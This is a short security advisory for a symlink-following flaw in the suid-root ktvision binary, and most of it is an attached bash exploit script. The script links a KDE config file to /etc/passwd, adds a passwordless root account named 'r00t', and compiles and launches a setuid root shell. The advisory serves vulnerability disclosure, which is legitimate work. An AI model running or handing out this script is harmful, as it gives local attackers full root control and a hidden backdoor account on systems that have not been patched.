|
Vulnerability KTVision Affected ktvision prior to 0.1.1-271 Description Paul Starzetz found following. There is a symlink follow problem in the (in many distributions suid root) ktvision binary. It is discouraging that nowadays such trivial symlink attacks are still possible. No comment anymore. In order to be complete: a bash script demonstrating this vulnerability is attached below. #!/bin/bash link=/home/paul/.kde/share/config linkto=/etc/passwd target=/opt/kde/bin/ktvision echo "" echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR" echo "" if ! test -u $target ; then echo "[-] $target not found" exit 1 fi; echo "[+] $target found" rm -f sush* cat <<__DUPA__>>sush.c #include <stdio.h> main() { setuid(geteuid()); setgid(getegid()); execl("/bin/bash", "/bin/bash", NULL); } __DUPA__ echo " compiling sush" res=$(gcc sush.c -o sush) if test "$res" != "" -o ! -x sush ; then echo "[-] failed" rm sush* ktvback.* exit 2; fi; echo "[+] success" cp $linkto ktvback.$$ mkdir -p $link rm -f $link/ktvisionrc ln -s $linkto $link/ktvisionrc echo "" echo -n "now running... (ensure that X is up and running)" $target >/dev/null 2>&1 & cpid=$! declare -i cnt declare -i max cnt=0 max=60 while ! test -O $linkto ; do sleep 1; printf " %.2d" $cnt cnt=$(($cnt+1)) if test $cnt -ge $max ; then echo "" echo "" echo "[-] FAILED" rm sush* ktvback.* exit 2; fi; done; kill -9 $cpid >/dev/null 2>&1 rm $link/ktvisionrc echo "" echo "" echo "[+] SUCCESS, creating sush" echo >>$linkto "r00t::0:0:root:/root:/bin/bash" echo "" su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp ktvback.$$ $linkto; chown 0.0 $linkto" rm ktvback.* sush.c if ! test -u sush ; then echo " hm strange error" rm sush* ktvback.* exit 1 fi; echo "" echo "starting ./sush" ./sush #!plonk Solution Nothing yet.